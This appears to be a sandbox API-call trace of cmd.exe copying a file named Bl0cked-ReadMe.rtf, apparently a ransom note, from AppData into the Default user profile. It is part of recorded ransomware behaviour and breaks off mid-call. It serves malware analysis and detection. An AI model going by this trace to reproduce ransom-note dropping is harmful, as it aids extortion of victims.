[0215.702] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0215.702] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0215.703] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0215.703] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0215.703] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0215.703] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0215.703] GetConsoleTitleW (in: lpConsoleTitle=0x1f08c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0215.703] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.704] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0215.704] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0215.704] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0215.704] _wcsicmp (_String1="type", _String2=")") returned 75 [0215.704] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0215.704] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0215.704] _wcsicmp (_String1="IF", _String2="type") returned -11 [0215.704] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0215.704] _wcsicmp (_String1="REM", _String2="type") returned -2 [0215.704] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0215.708] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.708] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.708] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.708] GetFileType (hFile=0x7) returned 0x2 [0215.708] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0215.708] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f670 | out: lpMode=0x18f670) returned 1 [0215.708] _dup (_FileHandle=1) returned 3 [0215.708] _close (_FileHandle=1) returned 0 [0215.708] _wcsicmp (_String1="C:\\Users\\Default\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0215.708] CreateFileW (lpFileName="C:\\Users\\Default\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x18f640, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0215.709] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0215.709] GetConsoleTitleW (in: lpConsoleTitle=0x18f470, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.710] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0215.710] _wcsicmp 
(_String1="type", _String2="ERASE") returned 15 [0215.710] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0215.710] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0215.710] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.711] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x18efd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18efd4) returned 0x1f0e30 [0215.711] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0215.711] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0215.711] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0215.711] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18dee0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0215.711] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0215.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.711] GetFileType (hFile=0x54) returned 0x1 [0215.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.711] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x18df38 | out: lpFileSizeHigh=0x18df38*=0x0) returned 0x1632 [0215.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.711] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0215.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.711] ReadFile (in: hFile=0x54, lpBuffer=0x18ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, 
lpNumberOfBytesRead=0x18df60*=0x200, lpOverlapped=0x0) returned 1 [0215.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.711] GetFileType (hFile=0x4c) returned 0x1 [0215.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.711] GetFileType (hFile=0x4c) returned 0x1 [0215.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.712] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] GetFileType (hFile=0x4c) returned 0x1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] WriteFile (in: hFile=0x4c, lpBuffer=0x18edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18edc0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] GetFileType (hFile=0x4c) returned 0x1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee10*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] GetFileType (hFile=0x4c) returned 0x1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee60*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] GetFileType (hFile=0x4c) returned 0x1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] WriteFile (in: hFile=0x4c, lpBuffer=0x18eeb0*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18eeb0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] GetFileType (hFile=0x4c) returned 0x1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef00*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] GetFileType (hFile=0x4c) returned 0x1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef50*, lpNumberOfBytesWritten=0x18df54*=0x20, lpOverlapped=0x0) returned 1 [0215.713] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.713] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.713] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.713] ReadFile (in: hFile=0x54, lpBuffer=0x18ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesRead=0x18df60*=0x200, lpOverlapped=0x0) returned 1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] GetFileType (hFile=0x4c) returned 0x1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] GetFileType (hFile=0x4c) returned 0x1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] GetFileType 
(hFile=0x4c) returned 0x1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] WriteFile (in: hFile=0x4c, lpBuffer=0x18edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18edc0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] GetFileType (hFile=0x4c) returned 0x1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee10*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] GetFileType (hFile=0x4c) returned 0x1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee60*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] GetFileType (hFile=0x4c) returned 0x1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] WriteFile (in: hFile=0x4c, lpBuffer=0x18eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18eeb0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] GetFileType (hFile=0x4c) returned 0x1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef00*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] GetFileType (hFile=0x4c) returned 0x1 [0215.714] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef50*, lpNumberOfBytesWritten=0x18df54*=0x20, lpOverlapped=0x0) returned 1 [0215.714] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.714] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.714] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.714] ReadFile (in: hFile=0x54, lpBuffer=0x18ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesRead=0x18df60*=0x200, lpOverlapped=0x0) returned 1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] GetFileType (hFile=0x4c) returned 0x1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] GetFileType (hFile=0x4c) returned 0x1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] GetFileType (hFile=0x4c) returned 0x1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] WriteFile (in: hFile=0x4c, lpBuffer=0x18edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18edc0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] GetFileType (hFile=0x4c) returned 0x1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee10*, 
lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] GetFileType (hFile=0x4c) returned 0x1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee60*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] GetFileType (hFile=0x4c) returned 0x1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] WriteFile (in: hFile=0x4c, lpBuffer=0x18eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18eeb0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] GetFileType (hFile=0x4c) returned 0x1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef00*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] GetFileType (hFile=0x4c) returned 0x1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef50*, lpNumberOfBytesWritten=0x18df54*=0x20, lpOverlapped=0x0) returned 1 [0215.715] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.715] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.715] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.715] ReadFile (in: hFile=0x54, lpBuffer=0x18ed70, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesRead=0x18df60*=0x200, lpOverlapped=0x0) returned 1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] GetFileType (hFile=0x4c) returned 0x1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] GetFileType (hFile=0x4c) returned 0x1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] GetFileType (hFile=0x4c) returned 0x1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] WriteFile (in: hFile=0x4c, lpBuffer=0x18edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18edc0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] GetFileType (hFile=0x4c) returned 0x1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee10*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] GetFileType (hFile=0x4c) returned 0x1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee60*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] GetFileType (hFile=0x4c) returned 0x1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] WriteFile (in: 
hFile=0x4c, lpBuffer=0x18eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18eeb0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] GetFileType (hFile=0x4c) returned 0x1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef00*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] GetFileType (hFile=0x4c) returned 0x1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef50*, lpNumberOfBytesWritten=0x18df54*=0x20, lpOverlapped=0x0) returned 1 [0215.716] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.716] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.716] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.716] ReadFile (in: hFile=0x54, lpBuffer=0x18ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesRead=0x18df60*=0x200, lpOverlapped=0x0) returned 1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] GetFileType (hFile=0x4c) returned 0x1 [0215.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.716] GetFileType (hFile=0x4c) returned 0x1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.717] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0215.717] GetFileType (hFile=0x4c) returned 0x1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] WriteFile (in: hFile=0x4c, lpBuffer=0x18edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18edc0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] GetFileType (hFile=0x4c) returned 0x1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee10*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] GetFileType (hFile=0x4c) returned 0x1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee60*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] GetFileType (hFile=0x4c) returned 0x1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] WriteFile (in: hFile=0x4c, lpBuffer=0x18eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18eeb0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] GetFileType (hFile=0x4c) returned 0x1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef00*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0215.717] GetFileType (hFile=0x4c) returned 0x1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef50*, lpNumberOfBytesWritten=0x18df54*=0x20, lpOverlapped=0x0) returned 1 [0215.717] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.717] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.717] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.717] ReadFile (in: hFile=0x54, lpBuffer=0x18ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesRead=0x18df60*=0x200, lpOverlapped=0x0) returned 1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] GetFileType (hFile=0x4c) returned 0x1 [0215.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.717] GetFileType (hFile=0x4c) returned 0x1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] GetFileType (hFile=0x4c) returned 0x1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] WriteFile (in: hFile=0x4c, lpBuffer=0x18edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18edc0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] GetFileType (hFile=0x4c) returned 0x1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, 
lpOverlapped=0x0 | out: lpBuffer=0x18ee10*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] GetFileType (hFile=0x4c) returned 0x1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee60*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] GetFileType (hFile=0x4c) returned 0x1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] WriteFile (in: hFile=0x4c, lpBuffer=0x18eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18eeb0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] GetFileType (hFile=0x4c) returned 0x1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef00*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] GetFileType (hFile=0x4c) returned 0x1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef50*, lpNumberOfBytesWritten=0x18df54*=0x20, lpOverlapped=0x0) returned 1 [0215.718] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.718] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.718] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.718] ReadFile (in: hFile=0x54, lpBuffer=0x18ed70, 
